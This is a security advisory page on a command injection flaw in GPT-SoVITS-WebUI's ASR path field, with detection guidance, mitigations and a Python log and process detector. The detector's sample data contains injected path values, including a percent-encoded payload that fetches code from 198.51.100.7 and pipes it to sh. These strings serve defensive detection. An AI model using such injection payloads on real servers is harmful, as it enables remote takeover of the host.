CVE-2025-49835 Overview
CVE-2025-49835 is a command injection vulnerability in GPT-SoVITS-WebUI, a voice conversion and text-to-speech web interface. The flaw is in the open_asr function in webui.py, where the user-controlled asr_inp_dir value (and several other variables) is concatenated into a command string that is then executed through the shell via os.system, with no sanitization in between. A remote attacker who can reach the web interface can therefore execute arbitrary commands on the host running the application.
Critical Impact
Remote attackers who can reach the web interface can execute arbitrary commands on the host by injecting them through the ASR (Automatic Speech Recognition) input directory field. The commands run as the user account that started the WebUI, so a successful attack can lead to full compromise of the server.
Affected Products
- GPT-SoVITS-WebUI (GitHub repository RVC-Boss/GPT-SoVITS; listed as rvc-boss gpt-sovits-webui), all versions up to and including 20250228v3
Discovery Timeline
- 2025-07-15 - CVE-2025-49835 published to NVD
- 2025-07-30 - Last updated in NVD database
Technical Details for CVE-2025-49835
Vulnerability Analysis
This command injection vulnerability (CWE-77) occurs due to improper neutralization of special elements used in a command. The open_asr function in webui.py accepts the asr_inp_dir value from the web form and formats it into a command string that is then executed through the shell via os.system. Because nothing validates or escapes the value, shell metacharacters in it are interpreted by /bin/sh, so an attacker can terminate the intended command and append their own.
The vulnerable function is reachable over the network through the Gradio-based web interface, which does not enforce authentication unless the operator configured it when launching the app, and exploitation needs no user interaction. An attacker who can reach the interface crafts an input containing a command separator (such as ;, |, or &&) followed by arbitrary commands; when the application runs the ASR step, the injected commands execute as the user account that launched webui.py.
Root Cause
The root cause is the direct concatenation of unsanitized user input into a string that is handed to the shell. The application performs no input validation or escaping and does not use an argument-list (shell-free) form of process execution. Several locations in webui.py follow the same pattern; the advisory cites lines 331, 341, 920, and 1034. Because the shell, not the application, parses the final string, any metacharacter that reaches it changes the command's meaning. Filtering characters out of the string is a weak fix; the durable one is to invoke the ASR script with an argument list (subprocess with shell=False) and to check that the supplied path lies under the expected data directory.
Attack Vector
This vulnerability is exploitable over the network through the GPT-SoVITS-WebUI web interface. An attacker can target the ASR functionality by providing a crafted directory path containing shell command injection sequences.
The attack flow typically involves:
- Accessing the GPT-SoVITS-WebUI interface
- Navigating to the ASR (Automatic Speech Recognition) functionality
- Submitting a malicious directory path containing command injection payloads
- The application concatenates the malicious input into a system command
- The injected commands execute on the server with application-level privileges
For the vulnerable code paths in detail, refer to the GitHub Security Lab advisories GHSL-2025-045 through GHSL-2025-048.
Detection Methods for CVE-2025-49835
Indicators of Compromise
- Unusual command execution patterns originating from the GPT-SoVITS-WebUI process
- Unexpected child processes spawned by Python or the web application
- Suspicious network connections initiated by the application server
- Anomalous file system modifications or new files created in system directories
- Web server or application logs containing shell metacharacters (;, |, &&, $(), backticks) or their percent-encoded forms (%3B, %7C, %26) in ASR-related parameters such as asr_inp_dir
Detection Strategies
- Monitor web application logs for requests containing shell metacharacters in input parameters
- Implement application-level logging to track all directory path inputs to the ASR functionality
- Deploy runtime application security monitoring to detect command execution anomalies
- Use endpoint detection solutions to identify suspicious process chains originating from Python web applications
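As an added example (not from the advisory or the project), here is a Python detector that applies the log and process-chain checks above to constructed sample data: it URL-decodes each recorded path field and looks for shell operators, then walks process-creation events beneath the WebUI for an sh -c command line carrying operators or a non-Python binary. The JSON log format, the field names, the pids and the event shape are all assumptions for illustration.

```python
"""Detection example added for this page (not from the advisory or the
project): flags shell operators in ASR path inputs recorded by the WebUI and
suspicious process chains beneath it. Log format, field names, pids and event
shape are assumptions for illustration."""
import json
import re
from urllib.parse import unquote

# Sequences /bin/sh treats as separators, pipes, background, substitution or
# redirection. Baseline the WebUI's legitimate command lines before alerting.
META_RE = re.compile(r"[;|&`<>]|\$\(|\$\{")

# Form fields that end up inside command strings (asr_inp_dir is the one the
# CVE names; the others are assumed for the example).
PATH_FIELDS = ("asr_inp_dir", "asr_opt_dir", "inp", "opt_root")

# Constructed sample log: one JSON record per WebUI call. The third record
# carries its payload percent-encoded.
SAMPLE_LOG = [
    '{"ts":"2025-07-20T10:01:02Z","func":"open_asr","asr_inp_dir":"/data/wavs",'
    '"asr_opt_dir":"output/asr_opt"}',
    '{"ts":"2025-07-20T10:03:17Z","func":"open_asr",'
    '"asr_inp_dir":"/data/wavs\\"; id > /tmp/o; echo \\"","asr_opt_dir":"output/asr_opt"}',
    '{"ts":"2025-07-20T10:05:44Z","func":"open_asr","asr_inp_dir":'
    '"%2Fdata%2Fwavs%22%3B%20curl%20http%3A%2F%2F198.51.100.7%2Fx%7Csh%3B%23",'
    '"asr_opt_dir":"output/asr_opt"}',
    '{"ts":"2025-07-20T10:06:10Z","func":"open_slice","inp":"/data/wavs",'
    '"opt_root":"output/slicer_opt"}',
]


def scan_log(lines):
    """One hit per path field whose URL-decoded value contains a shell
    operator. Decoding once means percent-encoded payloads are not missed."""
    hits = []
    for line in lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue                      # not a record we understand
        for field in PATH_FIELDS:
            raw = rec.get(field)
            if raw is None:
                continue
            value = unquote(raw)
            match = META_RE.search(value)
            if match:
                hits.append({"ts": rec.get("ts"), "field": field,
                             "token": match.group(0), "value": value})
    return hits


# Constructed process-creation events, the minimum an EDR or auditd pipeline
# provides. 4120 is the assumed pid of "python3 webui.py".
SAMPLE_PROCS = [
    {"pid": 4133, "ppid": 4120, "image": "/usr/bin/python3",
     "cmdline": "python3 tools/asr/run_asr.py -i /data/wavs -o output/asr_opt"},
    {"pid": 4141, "ppid": 4120, "image": "/bin/sh",
     "cmdline": 'sh -c python3 tools/asr/run_asr.py -i "/data/wavs"; id > /tmp/o; echo ""'},
    {"pid": 4142, "ppid": 4141, "image": "/usr/bin/curl",
     "cmdline": "curl http://198.51.100.7/x"},
]

# os.system() always runs through "sh -c", so sh itself is expected under the
# WebUI; the signals are operators in that command line and any non-Python
# binary anywhere beneath the WebUI process.
EXPECTED_IMAGES = {"/usr/bin/python3", "/bin/sh"}


def _descends_from(pid, root, by_pid):
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        parent = by_pid[pid]["ppid"]
        if parent == root:
            return True
        pid = parent
    return False


def scan_process_events(events, webui_pid):
    """Return (pid, reasons) for every descendant of webui_pid that looks
    like command injection rather than a normal ASR run."""
    by_pid = {e["pid"]: e for e in events}
    flagged = []
    for e in events:
        if not _descends_from(e["pid"], webui_pid, by_pid):
            continue
        reasons = []
        if e["image"] == "/bin/sh" and META_RE.search(e["cmdline"]):
            reasons.append("shell operator in sh -c command line")
        if e["image"] not in EXPECTED_IMAGES:
            reasons.append(f"unexpected binary {e['image']} under the WebUI")
        if reasons:
            flagged.append((e["pid"], reasons))
    return flagged


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("LOG ", hit["ts"], hit["field"], repr(hit["value"]))
    for pid, reasons in scan_process_events(SAMPLE_PROCS, webui_pid=4120):
        print("PROC", pid, "; ".join(reasons))
```

The two checks are deliberately independent: the log scan catches attempts whether or not they succeed, while the process-chain rule catches successful injections even when the attacker avoided the obvious characters in the field the application logged. In a real deployment, feed the legitimate sh -c command lines the WebUI produces into META_RE first and adjust it if they contain redirections, otherwise every normal ASR run will alert.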
Monitoring Recommendations
- Enable verbose logging for the GPT-SoVITS-WebUI application to capture all user inputs
- Configure network segmentation to limit the blast radius if the application server is compromised
- Implement file integrity monitoring on critical system directories
- Set up alerting for any outbound network connections from the application server to unexpected destinations
How to Mitigate CVE-2025-49835
Immediate Actions Required
- Restrict network access to the GPT-SoVITS-WebUI interface to trusted users and networks only
- Place a web application firewall (WAF) in front of the interface with rules for common command injection patterns, treating it as a stopgap only: Gradio submits form values inside JSON request bodies and payloads can be encoded, so a WAF catches the obvious cases rather than all of them
- Consider disabling the ASR functionality if not critical to operations
- Run the application in a sandboxed or containerized environment with minimal privileges
- Monitor the RVC-Boss GPT-SoVITS GitHub repository for security updates
Patch Information
As of the CVE's publication (July 2025), no patched release had been published by the maintainer. Organizations running GPT-SoVITS-WebUI should apply the workarounds below and watch the RVC-Boss/GPT-SoVITS repository and the GitHub Security Lab advisory for a fix.
Workarounds
- Deploy the application behind a reverse proxy with strict input validation rules
- Implement network-level access controls to limit who can access the web interface
- Run the application in a containerized environment with restricted capabilities and no network egress
- Patch webui.py locally so that the ASR command is built as an argument list and run with subprocess (shell=False), and reject input paths outside the expected data directory; filtering individual shell metacharacters out of the string is a weaker stopgap that encodings or an overlooked character can bypass
# Example: Restrict network access to GPT-SoVITS-WebUI using iptables
# Allow access only from a trusted IP range (e.g., 192.168.1.0/24).
# 7865 is a placeholder: use the port your deployment actually listens on
# (set in the project's config.py / launch options), and repeat the rules
# for any other port the WebUI exposes.
iptables -A INPUT -p tcp --dport 7865 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 7865 -j DROP
# Rules match in order: an earlier ACCEPT for this port would leave the DROP
# unreachable, so verify the resulting chain.
iptables -L INPUT -n --line-numbers
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.